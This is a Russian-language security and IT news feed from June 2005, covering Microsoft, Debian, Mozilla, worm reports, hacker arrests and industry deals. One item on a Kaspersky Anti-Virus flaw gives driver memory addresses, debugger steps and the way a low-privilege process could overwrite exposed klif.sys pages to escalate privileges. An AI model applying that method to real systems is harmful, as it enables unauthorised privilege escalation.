После нескольких месяцев тестирования Microsoft сообщила о выходе инструмента обновлений Windows Server Update Services (WSUS) и сервиса обновлений Microsoft Update (MU), сообщает 3dnews.ru. Выход обоих инструментов должен был состояться еще в первой половине прошлого года, но несколько раз откладывался. Microsoft объясняла это тем, что все силы брошены на Windows XP Service Pack 2, который, напомним, вышел в августе 2004-го. MU — это замена нынешнему сервису обновлений Windows Update. Он позволит скачивать апдейты сразу для нескольких продуктов Microsoft. WSUS — это улучшенная версия существующему ныне инструменту Software Update Services (SUS), ориентированному на бизнес-пользователей.
Сайт обновлений

8/06/2005 15:02 MS IE 7 поразят в правах
Один из авторитетных функционеров Microsoft подтвердил слухи о том, что следующая версия теряющего популярность браузера будет устанавливаться на компьютеры с "пониженными привилегиями". По словам вице-президента Microsoft Гордона Манджионе (Gordon Mangione), седьмая версия будет буквально набита разнообразными улучшениями, призванными повысить безопасность использования браузера, пишет eWeek. Улучшения, главным образом, состоят в том, что MS IE 7 будет изначально устанавливаться с пониженными пользовательскими привилегиями, что, по идее, должно затруднить задачу захвата компьютера с помощью атаки на браузер. Кроме того, браузер обещают научить распознаванию спуфинг-технологий и фишерских сайтов. Тем не менее, Microsoft намерена сохранить принцип "зон безопасности", теоретически (но, к сожалению, не практически) способных предотвратить доступ злоумышленников к ActivеX-контролам. Говоря о других улучшениях, Манджионе пообещал, что MS IE 7 научится работать с системой международных доменных имен (IDN) и RSS-потоками. В него даже встроят текстовые поля для поиска по интернету через сайты ведущих поисковых компаний. То есть, может быть, когда-нибудь, MS IE даже сравняется по функциональности с Opera и Firefox.
Источник

8/06/2005 14:19 Ошибка в дисках Debian GNU/Linux 3.1 "Sarge"
В день выхода Debian "Sarge" в нём была обнаружена ошибка, потенциально способная повлиять на безопасность установленной системы, сообщает linux.org.ru. Сообщение на официальном сайте, содержащем образы дисков: @В образах CD/DVD-дисков версии 3.1R0 была обнаружена ошибка: система, установленная с этих дисков, в файле /etc/apt/sources.list будет содержать закомментированную строку "http://security.debian.org/ testing/updates" вместо активной строки "http://security.debian.org/ stable/updates", и поэтому не будет по умолчанию обращаться за обновлениями, исправляющими проблемы в безопасности. Причиной этого являются неверные Release-файлы в образах. Если Вы уже установили систему, используя образ CD/DVD-диска версии 3.1R0, переустановка не требуется. Вместо этого, просто отредактируйте файл /etc/apt/sources.list и во всех строках, где упоминается сайт security.debian.org, измените слово "testing" на "stable", а также удалите символ "# " из начала строки. Если Вы уже установили систему каким-либо другим способом, кроме CD-дисков или DVD-дисков (например, посредством загрузки по сети или с дискет и последующей установки базового набора пакетов из сети), данная проблема Вас не коснётся. Новые образы версии 3.1r0a, содержащие исправление этой ошибки, скоро будут доступны. Мы приносим наши извинения за причинённые неудобства".
Заявление Debian

8/06/2005 13:57 Microsoft хочет стать телекоммуникационным гигантом
Корпорация Microsoft и американская телефонная компания AT&T заявили о начале совместной работы над системами обмена сообщениями, обработки текста и другими технологиями, которые приблизят телефонию к интернету. Гиганты заключили 5-летнее соглашение, о финансовой стороне которого не сообщают. «AT&T открывает свою глобальную IP-сеть для 6,5 млн. разработчиков ПО для ОС Microsoft, которые смогут использовать ее для своих нужд», — заявил вице-президент телефонной компании Эрик Шепкейро (Eric Shepcaro). Одна из первых целей соглашения — встроить сервисы IP-телефонии AT&T в портфолио удаленных услуг Microsoft для бизнеса. По словам Шепкейро, первые продукты альянса появятся в следующем году. Сделка также направлена на помощь телефонной компании в решении проблемы падения прибыли от продаж корпоративных услуг обмена данными по IP.
CNews

8/06/2005 13:47 Брюс Шнайер предсказывает разгул точно наводящихся вирусов
Брюс Шнайер, основатель компании Counterpane Internet Security, известнейший специалист по криптографии, опубликовал на своём сайте эссе, посвящённое тенденциям в сфере сетевых рисков, сообщает "Компьюлента". Не давая никаких особых оценок, Шнайер просто перечисляет ожидаемые сценарии, и будущее выглядит весьма мрачно. По мнению Шнайера, в самом ближайшем времени следует ожидать комплексных червей, способных выполнять целый ряд функций, и в качестве примера предлагает вирус KEG.Spybot, который производит анализ общей уязвимости заражённой системы и отсылает отчёт своему автору через IRC-каналы. Шнайер предсказывает, что Microsoft Internet Information Services (IIS-сервер) будет ещё долго оставаться излюбленной мишенью для хакеров, хотя по мере того, как всё большее число компаний будут мигрировать на Windows 2003 и IIS 6, количество атак против IIS начнёт снижаться. Пиринговые сети, как полагает Шнайер, станут основным каналом первичного распространения вирусов. Кроме того, Шнайер ожидает скорого появления многочисленных вирусов "точного наведения". "Недавно мы обнаружили вирусы, которые используют сторонние средства сбора информации, в том числе Google, для углублённой разведки. Это приведёт к более эффективным методам распространения: вместо того чтобы распространяться хаотично, вирусы будут наводиться точно по конкретным целям, - прогнозирует Шнайер. - Благодаря тому, что такие мишени будут определяться с помощью сторонних служб, резко снизится количество "шума", который вирусы обычно производят при случайном выборе мишеней, следовательно срок между появлением и первым обнаружением червя резко увеличится". Вслед за рядом других специалистов Шнайер указывает, что взломы и DDoS-атаки превращаются в теневой бизнес. Хакеры торгуют информацией об обнаруженных уязвимостях, а те из них, в распоряжении которых имеются "зомби-сети", шантажируют коммерсантов, угрожая DDoS-атаками. Шнайер, впрочем, указывает, что большая часть "наездов" хакеры совершают на периферийных коммерсантов - онлайновые казино, игровые и порноресурсы. И чем чаще от хакеров откупаются, тем больше они наглеют. Впрочем, Шнайер прогнозирует, что в скором времени хакеры начнут атаковать и финансовые учреждения, поскольку онлайновые криминальные элементы ищут новые источники дохода. "Кроме того, ожидается всё больше "инсайдерских" атак с целью наживы. Уже сейчас большая часть целенаправленных атак производится из сетей самих атакованных организаций. Мы также ожидаем увеличения количества политически мотивированных хакерских атак..." - пишет Шнайер. Полностью с его прогнозами можно ознакомиться здесь.
Cтатья

8/06/2005 13:06 Опасная дыра открывала доступ к аккаунтам Hotmail
Корпорация Microsoft была вынуждена временно закрыть один из разделов портала MSN из-за наличия на нем опасной уязвимости. Как сообщает CNET News, брешь была обнаружена голландским программистом Алексом де Врисом, а информация о ней появилась в интернете в конце прошлой недели. Проблема связана с особенностями реализации ресурса I Love Messenger. Используя содержащиеся на этом сайте ошибки, злоумышленник мог организовать XSS-атаку (Cross-Site Scripting) и получить несанкционированный доступ к файлам cookies на компьютере жертвы. "Куки" представляют собой особые метки, которые пользователи интернета получают при посещении определенных веб-сайтов. С их помощью сохраняются некоторые сведения о пользователях, в частности, информация об аккаунтах. Похитив такие файлы, нападающий теоретически мог затем получить доступ к аккаунту в почтовой системе Hotmail. Корпорация Microsoft признала наличие уязвимости и временно заблокировала ресурс I Love Messenger. На момент написания заметки при попытке посещения данного веб-сайта открывалась страница интернет-пейджера MSN Messenger.
Подробнее об уязвимости

8/06/2005 12:34 План «гипервизора» Microsoft обретает форму
Во вторник Microsoft рассказала новые подробности о своем плане выпуска Windows-«гипервизора» для исполнения нескольких операционных систем на одном компьютере. На конференции Microsoft Tech Ed в Орландо (штат Флорида) Боб Маглиа, старший вице-президент отделения Windows Server Division, сказал, что это ПО будет «встроено непосредственно в Windows и позволит компаниям виртуализировать несколько операционных систем». Впервые СЕО Microsoft Стив Баллмер упомянул о планах выпуска гипервизора в апреле, на конференции Microsoft Management Summit. Эта функция полезна для консолидации серверов в целях экономии и для получения максимально возможной отдачи от одной системы. По словам Маглиа, ПО гипервизора выйдет в 2007 году, после дебюта Longhorn Server. В нем будет применена технология виртуализации, которую в будущем году предложат производители процессоров Intel и AMD. Гипервизор будет отличаться от существующего продукта Microsoft Virtual Server, который работает поверх Windows и позволяет исполнять несколько сеансов Windows. Последнее обновление Virtual Server позволяет исполнять также Linux и другие операционные системы. Новое ПО будет встроено непосредственно в Windows. «Мы создадим тонкий гипервизор, который пролегает над аппаратурой и виртуализирует такие ресурсы, как центральный процессор и память, так что может создавать сеансы ОС, — сказал Маглиа. — Один из таких сеансов будет иметь встроенный стек виртуализации, чтобы распределять устройства и инициировать и прекращать виртуальные сеансы. У него будет и версия для Windows, но обычно это будет минимальная (stripped-down) версия. Она станет управлять другими сеансами, которые могут быть сеансами Windows, Linux или чего-то еще, что работает на аппаратуре х86, например Solaris».
Подробнее

8/06/2005 12:06 Взломавший сети Пентагона и NASA хакер арестован в Лондоне
В Великобритании арестован человек, который предположительно взломал компьютерные сети Министерства обороны США и NASA, сообщается на сайте BBC News. 39-летний Гари Маккиннон (Gary McKinnon), проживающий на севере британской столицы и известный в интернет-сообществе под прозвищем Solo, был задержан около 18:30 во вторник. В среду магистратский суд Лондона примет решение об его экстрадиции в США. Американские власти обвиняют Маккиннона в том, что в 2002 году он проник в один из военных компьютеров на базе Форт-Майер в штате Вирджиния, получил права администратора и уничтожил около 1300 пользовательских паролей, а также секретную и важную информацию, доступную по внутренней сети. В результате действий британца военные понесли прямой ущерб на 5 тысяч долларов. США утверждают, что поиск проблемы и отладка компьютеров стоили правительству почти миллион долларов. Если безработного системного администратора признают виновным и выдадут США, то ему грозит тюремное заключение на срок до пяти лет и штраф в размере ста тысяч долларов. В 2002 году в США ему заочно было предъявлено обвинение по восьми эпизодам связанных с компьютерными технологиями преступлений, совершенных в 14 штатах. Один из гособвинителей тогда назвал хакерскую атаку Маккиннона "крупнейшим взломом военных компьютеров в истории".
Подробности

7/06/2005 12:15 Новая Symbian вызовет возмущение правозащитников
Компания Symbian представила 9-ю версию своей одноименной операционной системы для смартфонов. Первые телефоны на ее основе появятся уже в этом году. В систему внесен ряд дополнений и изменений. Для мультимедийных телефонов добавлены поддержка стереонаушников Bluetooth, карт памяти с USB-интерфейсом, улучшенное микширование и средства воспроизведения звука, а также поддержка последних версий стандартов MPEG и OMA DRM («управление цифровыми правами» от Open Mobile Alliance). Улучшен функционал трехмерной графики и графического акселератора, контроля размеров дисплея. В функции корпоративной поддержки также вошли оптимизированная фильтрация и сортировка электронных писем на IMAP-серверах, возможности группового расписания, в том числе принятия приглашения на встречу, отправленного из приложений Lotus Notes и Microsoft Outlook. Система поддерживает последнее поколение ARM-процессоров с функциями энергосбережения. Добавлена возможность удаленного вмешательства, совместимая с OMA Device Management: операторы и корпоративные менеджеры смогут получить удаленный доступ к телефону для установки новых приложений или диагностики неисправности, а также вести аудит установленных приложений. Вероятно, возможность удаленного управления и аудита в новой ОС вызовет возмущение правозащитников.
CNews

7/06/2005 11:58 Cisco запускает службу защиты от DDoS
Cisco анонсировала свой новый сервис Cisco Distributed Denial of Service Protection Solution, направленный на противодействие распределенным атакам, сообщает bugtraq.ru. Данное решение ориентировано на крупных провайдеров. Пользовательские сети мониторятся на предмет отклонений от стандартного трафика, DDoS-трафик переправляется в "центр дезинфекции", и все, выходящее за рамки заданных правил, блокируется. По словам вице-президента Cisco Мика Скалли (Mick Scully), это означает переход от интернета, основанного на модели доверия по умолчанию, к модели всепроникающего недоверия. Некоторые крупные провайдеры, такие как Sprint и MCI, уже объявили об использовании этой службы.
Подробности

7/06/2005 11:35 Sophos: хакеры готовятся выпустить мощный супер-вирус
Сотрудники компании Sophos, специализирующейся на вопросах компьютерной безопасности, предупреждают, что в интернете в ближайшее время может разразиться глобальная вирусная эпидемия, сообщает "Компьюлента". К такому выводу эксперты Sophos пришли, проанализировав код многочисленных вариантов червя Mytob. Первая модификация Mytob была обнаружена в конце февраля нынешнего года. Вредоносная программа распространяется по электронной почте в виде вложений, а также через дыру в локальной подсистеме аутентификации пользователей (LSASS) операционных систем Microsoft Windows 2000/ХР. Попав на компьютер, червь извлекает из файлов с определенными расширениями адреса электронной почты и рассылает по ним свои копии. Сотрудники Sophos отмечают, что модификации Mytob мало чем отличаются друг от друга, и большинство антивирусов способны обнаруживать новые варианты вредоносной программы даже без обновления баз данных. Тем не менее, комментарии в коде Mytob и другие признаки позволяют предположить, что авторы Mytob действуют согласно четкому плану с целью превращения червя в мощный супер-вирус. В пользу этого говорят и заложенные в тело Mytob функции отключения опций безопасности на инфицированных компьютерах, а также возможность блокирования червем доступа к веб-сайтам антивирусных компаний. Некоторые версии Mytob также способны открывать "черный ход" в систему и загружать дополнительные компоненты.
Подробности

7/06/2005 10:38 Выход Fedora Core 4 задерживается
Как сообщает Bill Nottingham, от имени разработчиков компании Red Hat, запланированный на вчера выход новой версии Fedora Core 4, переносится на 13 июня (прим. ньюсмейкера:неплохое число для выпуска нового релиза ОС) ввиду "непредвиденных трудностей".
Подробности

7/06/2005 10:15 Программа компьютеризации ФБР провалилась из-за разгильдяйства
Комитет Палаты представителей США по бюджетным ассигнования рассматривает закрытый доклад о проваленном проекте автоматизированной системы делопроизводства для Федерального бюро расследований (ФБР) США, на который было выделено 170 миллионов долларов, сообщает в понедельник газета Washington Post. Согласно сведениям газеты, парламентарии из комитета по опросам и расследованиям пытаются выяснить, почему несмотря на то, что некоторые специалисты начали ставить целесообразность проекта под сомнение еще в 2003 году, работы над ним все равно продолжились, было потрачено 100 миллионов прежде, чем директор ФБР Роберт Мюллер официально объявил о провале проекта в минувшем марте. Проект назывался Virtual Case File (VCF) и входил в более обширную программы Trilogy стоимостью 581 миллионов долларов, которая подразумевает техническую модернизацию и компьютеризацию всей структуры ФБР. Мероприятия VCF должны были стать завершающим этапом программы и объединить выданные агентам и аналитикам бюро новые компьютеры в единую систему, работающую на специально разработанном программном обеспечении. Однако по мере разработок стало ясно, что программная оболочка содержит большое количество ошибок и бесперебойную ее работу наладить не удается. К 2004 году было известно о наличии около 400 регулярно возникающих системных проблем. Тем не менее, это не помешало потратить еще 17 миллионов на программу по тестированию системы, после чего было принято решение о ее сворачивании. В докладе перечисляются ошибки и проблемы VCF, информацию о которых удалось собрать ведущим расследование парламентариям. В частности, упоминается привлечение к работам недостаточно квалифицированных людей, плохое планирование и плохой контроль за выполнением поставленных задач. В настоящее время, отмечает газета, представители ФБР на условиях анонимности сообщают, что в бюро идет насштабная реструктуризация и пересмотр методик работы в связи с выявленными недочетами. Представители отмечают, что работа ведется в настоящий момент и еще не закончена.
Источник

6/06/2005 16:56 В браузерах семейства Mozilla обнаружена уязвимость семилетней давности
Как сообщает Secunia, в новых версиях браузеров семейства Moziila (под раздачу попали недавновышедшие версии Firefox 1.0.4 и Mozilla 1.7.8) обнаружена уязвимость, которая была обнаружена ещё 7 лет назад (и потом успешно залатана в вышедших версиях браузеров, существовавших на тот момент). Уязвимость заключается в возможности внедрения фрейма (Frame Injection) и позволяет удалённым злоумышленникам подменить содержимое сайта, который якобы посещает пользователь браузера. В качестве временной меры предосторожности рекомендуется не посещать сайты, не пользующиеся доверием. Выпущен тестовый эксплоит.
Страница проверки

6/06/2005 16:31 Итоги крупномасштабной антихакерской спецоперации в Волгоградской области
В течение первого полугодия 2004 года на территории Волгоградской области сотрудниками регионального Отдела “К” Бюро специальных технических мероприятий при МВД России проводилась крупномасштабная спецоперация по пресечению незаконной деятельности в местном сегменте сети Интернет. В ходе ее проведения были выявлены и раскрыты 167 использований вредоносных программ для ЭВМ с целью несанкционированного копирования учетной компьютерной информации пользователей сети Интернет (логинов и паролей, IP- и МАС-адресов) – преступлений, предусмотренных ч. 1 ст. 273 УК РФ, а также более 140 неправомерных доступов к охраняемой законом компьютерной информации (ч. 1 ст. 272 УК РФ). По данным фактам 15 сентября 2004 года Главным следственным управлением при ГУВД Волгоградской области было возбуждено уголовное дело, расследованием которого в силу его сложности и объема занималась группа следователей (в соответствии со ст. 163 УПК РФ). При производстве по уголовному делу, помимо вышеуказанных, были также выявлены и раскрыты еще целый ряд преступлений, предусмотренных ч. 1 ст. 272 УК РФ и ч. 1 ст. 165 УК РФ “Причинение имущественного ущерба путем обмана или злоупотребления доверием при отсутствии признаков хищения”. Подозреваемыми по уголовному делу проходили 48 человек в возрасте от 14 до 24 лет, которые осуществляли свою противоправную деятельность на территории нескольких городов Волгоградской области. Как было установлено следствием, они в период с августа 2003 года по октябрь 2004 года, различными путями приобретали чужие логины и пароли, которые затем незаконно использовали для работы в сети Интернет. При этом доступ законных пользователей в компьютерную сеть блокировался, т.к. в ней одновременно не могут работать две ЭВМ с одними и теми же учетными (идентификационными) данными, а затраты по оплате предоставленных услуг Интернет относились на счет потерпевшего, чьи логин и пароль использовались при входе в сеть. Более подробно о доблестной работе не менее доблестных правоохранительных органов можно прочитать по ссылке, приведённой ниже. Особенно радуют результаты проведённой "операции" - цитирую:
- вину 2 лиц следствию не удалось доказать в полном объеме;
- 5 человек на момент совершения преступлений, предусмотренных ст. 272 и 165 УК РФ, достигли возраста 14 лет, но не достигли возраста 16 лет, с которого наступает уголовная ответственность за данные преступления;
- 39 человек деятельно раскаялись, активно сотрудничали со следствием, ранее к уголовной ответственности не привлекались, примирились с потерпевшими, возместили причиненный им материальный и моральный вред, а также впервые совершенные этими подозреваемыми преступления относятся к преступлениям небольшой и средней тяжести.
В отношении оставшихся двух(!) подозреваемых уголовные дела были выделены в отдельное производство. 27 апреля 2005 года им были предъявлены обвинения, после ознакомления с которыми уголовные дела переданы в Волгоградский областной суд.
Подробности

6/06/2005 16:02 Уязвимость в Антивирусе Касперского
На сайте "SoftSphere Technologies" сообщается о наличии уязвимости в популярном антивирусном продукте "Антивирус Касперского" (он же - KAV). В версиях 5.0.227, 5.0.228 (в составе Kaspersky Personal Security Suite) и 5.0.335,работающих под операционной системой Windows2000 (в WinXP уязвимость не обнаружена), обнаружено грубейшее нарушение подсистемы безопасности операционной системы с возможностью её эксплуатации для поднятия собственных привилегий в системе. Было выявлено, что подсистема резидентной защиты антивируса напрямую вызывает функцию из драйвера klif.sys, являющимся частью антивируса. Исключения защиты страницы при этом не возникает, поскольку со страницы драйвера klif.sys снимается бит супервизора, что делает его полностью доступным для приложений уровня пользователя. Точка входа функции внутри драйвера klif.sys вызывается при загрузке динамических бибилотек внутрь старого, либо вновь создаваемого процесса. Внутри же этой функции происходит процесс загрузки динамических библиотек. Функция внутри драйвера находится по адресу 0xBE934FE1 (0xBE934FA0 для версии 5.0.335), её вызов происходит с помощью инструкции jmp (код 0xE9), находящейся по адресу kernel32!+0x5DFC2. Передача управления на этот джамп происходит из библиотек rpcrt4.dll, shell32.dll, ole32.dll, oleaut32.dll, shim.dll (часть KAV). Для визуального выявления данной уязвимости достаточно поставить точку останова в SoftIce на адрес 0xBE934FE1 (0xBE934FA0 для версии 5.0.335), запустить новое приложение (любое) и посмотреть на текущий селектор, атрибуты текущей страницы драйвера klif.sys и адрес возврата. Эксплуатация данной уязвимости возможна путём перезаписывания части кода и данных в открытых частях драйвера klif.sys в процессе с низким уровнем привилегий. После чего, если в программе или сервисе с высоким уровнем привилегий произойдёт загрузка динамической бибилотеки, этот код получит управление в адресном пространстве процесса с высоким уровнем привилегий. Выпущен тестовый эксплоит уязвимости.
Подробное описание

6/06/2005 15:36 В Германии паспорта с RFID-чипами появятся в ноябре
Правительство Германии сообщило, что первые паспорта с биометрическими данными, сохранёнными на RFID-чипах, появятся в ноябре 2005 года. В начале чип паспорта будет содержать только цифровую фотографию, позже будут добавлены отпечатки пальцев и, возможно, результаты сканирования рисунка глаза. "Электронный паспорт" будет действителен 10 лет, как и действующий вариант паспорта, но стоить будет 59 евро вместо 23. Подобное подорожание очень взволновало бережливых немцев, несмотря на то, что, по словам министра внутренних дел Германии, такая цена будет ниже среднемировой. В США паспорта с биометрическими характеристиками скорее всего будут стоить 75 евро, а в Великобритании даже 103 евро. Заказы на изготовление чипов для новых паспортов получили компании Infineon и Philips. Будут использоваться чипы с объёмом памяти 72 и 64 Кб. Данные на чипах будут защищаться различными методами, включая электронную подпись и RAS-кодирование.
Mobile-Review

6/06/2005 14:52 Microsoft ударит по Adobe при помощи Metro?
Открытый стандарт документов Microsoft Metro, представленный корпорацией в апреле, может создать серьезную конкуренцию формату PDF от Adobe. Спецификация Microsoft Metro состоит из двух частей: «Структуры Metro» (Metro Framework), описывающей соглашения по упаковке и физической конвертации форматов для использования XML, Unicode, ZIP и других технологий, и «Формата доступа пакета Metro» (Metro Reach Package Format), описывающего разметку XML для представления и обработки страниц. Открытость приложений и исходного кода, частичная или полная, становится стратегией «статуса кво» для множества компаний. Недавно на ежегодной конференции Windows Hardware Engineering (WinHEC) Билл Гейтс представил Metro — «набор соглашений для использования XML и других широко доступных технологий для описания содержимого и представления страничных документов». В Microsoft говорят, что Metro предназначена для «оптимизации архитектуры печати Longhorn». В Metro будет использоваться модель WinFX. Использование продукта не будет облагаться лицензионными отчислениями. Metro будет встроена в ОС Longhorn в 2006 году, бета-версия которой появится уже в этом году. Несколько лет назад подобную идею рассматривали в Apple, лицензировав и встроив PDF в свою операционную систему. Открытость может стать ударом по крупным производителям систем работы с документами, в первую очередь, Adobe Systems и его формату PDF.
CNews

6/06/2005 14:29 McAfee купила поставщика ПО для защиты сетей Wi-Fi
Компания McAfee, производитель антивирусного программного обеспечения, объявила о покупке софтверной корпорации Wireless Security, специализирующейся в организации защиты беспроводных сетей Wi-Fi. Об этом сообщает агентство Reuters. Сумма сделки не разглашается, но по данным источников, близких к McAfee, приобретение обошлось в 20 миллионов долларов США. Во владение McAfee перешли все акции, находящиеся в обращении, технологии и активы калифорнийской компании Wireless Security. Весь персонал Wireless Security войдет в штат McAfee, однако точное количество сотрудников новоприобретенной компании не называется. ПО Wireless Security для домашних пользователей и малого бизнеса будет включено в состав таких продуктов McAfee для обеспечения компьютерной безопасности, как Internet Security Suite, VirusScan, Personal Firewall и Managed VirusScan. По словам представителей McAfee, в текущем году приобретать фирмы, разрабатывающие софт для защиты сетей Wi-Fi от интернет-угроз, больше не планируется. Но в то же время компания продолжает рассматривать возможность покупки как антивирусных фирм, чьи бумаги обращаются на публичном рынке, так и частных фирм.
Источник

6/06/2005 14:07 Планы выпуска FreeBSD 6.0
Как сообщает opennet.ru, Scott Long сообщил о планах выхода FreeBSD 6.0. 10 июня планируется начать подготовку к заморозке кода, никакие новые возможности с этого момента добавляться не будут. Все силы будут брошены на чистку кода, исправление ошибок и повышение производительности и стабильности. 10 июля планируется создать ветку RELENG_6. 1 августа - RELENG_6_0. 15 августа - выпуск релиза 6.0-RELEASE. Так же в своем сообщении Scott Long расказывает о судьбе 5-ой ветки. Переход от 5.х к 6.0/6.1 будет достаточно тривиальным, поэтому рекомендуется не затягивать с обновлением. Поддержка 5-ой ветки командой безопасности FreeBSD будет продолжаться ориентировочно до 2007 года.
Подробности

6/06/2005 13:25 Intel отрицает наличие DRM в Pentium D
Как сообщает Inquirer, Intel опроверг информацию о том, что в новом процессоре Pentium D и чипсетах 945 семейства реализована технология DRM, как сообщалось ранее. Утверждается, однако, что продуктах компании будет реализована поддержка некоторых схем защиты от копирования, таких как Macrovision, DTCP-IP, COPP, HDCP, CGMS-A. В заключении указано: "Хотя Intel продолжает работу над различными механизмами защиты контента, но ни Pentium D, ни 945 чипсете не содержат скрытой реализации какого-либо из них". Само собой, глупо было бы ждать иного ответа от Intel, разве что молчания, сообщает linux.org.ru.
Подробнее

6/06/2005 12:59 Red Hat отпускает Fedora Linux на волю
Red Hat вновь меняет курс в отношении своей бесплатной версии Linux Fedora: в пятницу компания объявила, что она передаст авторские права и разработку по этому проекту независимой организации Fedora Foundation. Когда-то у Red Hat была только одна версия Linux, но начиная с 2002 года она разделилась на коммерчески поддерживаемый продукт Red Hat Enterprise Linux (RHEL) и бесплатную и быстро развивающуюся версию Fedora. Однако компании так и не удалось достичь той цели, которая первоначально ставилась перед Fedora: привлечь к разработке широкие круги программистов. Учитывая, что Red Hat рассматривает Fedora как платформу для ускоренной отработки тех функций, которые она хочет со временем добавить в RHEL, не удивительно, что программисты считают эту версию проектом Red Hat. Однако компания предпринимает конкретные шаги, направленные на самостоятельное развитие Fedora. Сообщество разработчиков находится накануне выпуска новой версии ПО. В понедельник должна выйти версия Fedora Core 4 с расширенной поддержкой процессоров, программой Xen для исполнения нескольких операционных систем на одном компьютере, версией 4 компилятора GCC и другими новыми функциями. Последним шагом стало создание организации Fedora Foundation, которая, вместо Red Hat, будет наблюдать за авторскими правами на код, добавляемый в Fedora, — об этом сообщил заместитель главного юрисконсульта Red Hat Марк Веббинк на первой конференции пользователей компании в пятницу. «Red Hat продолжит существенную финансовую и техническую поддержку, но этот шаг обеспечит более широкое участие сообщества в проектах, спонсируемых Fedora», — говорится в заявлении Red Hat.
Подробности

6/06/2005 12:35 Wall Street Journal пообещала скорый переход Apple на Intel
Американская финансовая газета Wall Street Journal в воскресенье со ссылкой на информированные источники в компьютерной компании Apple сообщила, что в понедельник глава компании Стив Джобс (Steve Jobs) на открывающейся в Сан-Франциско конференции разработчиков ПО для платформы Macintosh WWDC-2005 намерен объявить о готовящемся переходе Apple на процессоры фирмы Intel и пояснить, почему именно компания приняла такое решение. Как отмечает агентство Reuters, если переход состоится, это будет серьезный сдвиг в политике компании и крайне успешная сделка для Intel, при том, что производители использующихся сейчас в компьютерах Macintosh процессоров PowerPC IBM и Freescale Semiconductor потеряют значительную часть прибыли. Вместе с тем, слухи о подобных шагах со стороны Apple появляются в прессе регулярно, но каких-либо реальных действий в этом направлении сделано не было, сообщалось лишь о неких переговорах. Переход на другую процессорную архитектуру требует перестройки использующихся в Macintosh операционных систем и программ (циркулируют слухи о "секретных" разработках версии ОС MacOS для архитектуры Intel), что вряд ли вызовет одобрение у многих пользователей этой платформы. Некоторые аналитики заявляют, что слухи распространяет сама Apple, чтобы оказывать давление на IBM
Lenta.Ru

5/06/2005 13:03 Следующей целью хакеров станет голосовая телефония
Провайдерам необходимо сконцентрировать больше ресурсов на защите систем передачи голоса по IP-каналам (VoIP), в том случае, если они хотели бы обеспечить должный уровень надежности и создать приток клиентов, предупреждают аналитики. Согласно документу, опубликованному компанией BearingPoint, операторы широкополосной связи должны обратить серьезное внимание на проблемы безопасности, перед тем как усиленно продвигать услуги интернет-телефонии с целью увеличения прибыли в ввода новых услуг. Компания BearingPoint, занимающаяся консалтингом и системной интеграцией, говорит, что следующей наиболее вероятной целью хакеров и сетевых мошенников станут системы VoIP. Скорее всего, хакеры будут пытаться различными способами украсть информацию или просто нарушать работу сервисов. "Чтобы выдержать скорый бурный рост числа VoIP-подключений, поставщики этих услуг должны выработать стандарты безопасности для подобных решений", - говорит управляющий директор BearingPoint Фред Хоффманн. "Каждый провайдер, выходящий на рынок VoIP должен признать и изучить множество проблем безопасности. У хакеров не будет шанса, если провайдеры еще раз изучат свои системы и проверят их на безопасность, а также определят системные политики и стратегии для новых систем еще до их развертывания. Они должны сами быть уверены в безопасности сетей".
Источник

5/06/2005 11:36 Британских перепрошивателей будут наказывать строже
Министерство внутренних дел Великобритании (Home Office) представило на рассмотрение парламента Билль о насильственных преступлениях, в котором особое внимание уделяется перепрошивке серийных номеров (IMEI) краденых мобильников. По статистике полиции, ежедневно в Лондоне крадут 328 трубок, половину из них — у несовершеннолетних. Оборудование операторов позволяет блокировать телефоны по их серийному номеру, однако перепрошивка IMEI делает эту меру бесполезной. В 2002 году «Актом 2002 о мобильных телефонах (перепрограммировании)» была введена уголовная ответственность за перепрошивку. Новый документ ставит вне закона также предложение или согласие лица на перепрошивку телефона. По словам представителя Форума Mobile Industry Crime Action Джека Рейза (Jack Wraith), две трети мобильных телефонов могут быть перепрограммированы. С трубками нового поколения этого сделать нельзя, но «этот день наступит, и мы должны это предусмотреть», — сказал он в интервью газете Guardian.
Источник

5/06/2005 10:58 Новый скрэмблер защитит GSM от прослушивания
Австралийская компания SecureGSM выпустила программу для шифрования разговоров в GSM-сетях. По мнению разработчиков, продукт возвращает былую надежность стандарту сотовой связи, взломанному примерно 5 лет назад. Управляющий директор SecureGSM Роман Королик (Roman Korolik) сказал, что за время после обнаружения возможности взлома стандарта на рынке появился целый арсенал инструментов подслушивания - от эмуляторов базовых станций до расшифровщика разговоров в реальном времени. "Хотя они, строго говоря, нелегальны во многих странах, вы можете их приобрести. Вы только представьте себе, что в таких местах как биржи могут оказаться несколько сканеров", - говорит г-н Королик. Впервые надежность стандарта GSM была поставлена под сомнение в 1999 году. Лаури Песонен (Lauri Pesonen) из Технологического университета в Хельсинки считает, что модель GSM может быть "взломана на многих уровнях". SecureGSM работает под мобильной ОС Windows Mobile Phone Edition с ARM или совместимым процессором от 200 МГц, требует 6 МБ оперативной памяти и 2 МБ на носителе. Используется 256-битное тройное шифрование по алгоритмам AES, Twofish и Serpent. По утверждению разработчиков программы, все они считаются "невзламываемыми", а тройное шифрование делает продукт надежным и на будущее. Стоимость скрэмблера - $188 для использования в одном устройстве.
CNews

5/06/2005 10:34 Cognitive запатентовала новую технологию защиты данных
Компания Cognitive Technologies получила очередной патент за разработку новой технологии обеспечения информационной безопасности - свидетельство "Роспатента" о регистрации авторских прав на разработку технологии обеспечения информационной безопасности информационно-маркетингового центра. Данная технология будет использоваться для защиты данных в информационно-маркетинговых центрах, создаваемых в рамках ФЦП "Электронная Россия". Изобретение относится к разряду вычислительной техники и информационных технологий. Как сообщают разработчики, его техническим результатом является повышение надежности защиты системы от несанкционированного доступа путем реализации криптографической защиты данных торговых сделок. Это достигается за счет того, что система содержит три регистра, блок идентификации пользователей, два блока сравнения, блок приема запросов пользователей, блок селекции опорных адресов базы данных ИМЦ, блок селекции адресов рабочих мест пользователей, блок выдачи данных и блок формирования сигналов считывания данных. По словам представителей Cognitive, на создание технологии было затрачено порядка 2,5 тыс. человеко-часов.
Источник

5/06/2005 10:11 В России задержана группа компьютерных шантажистов
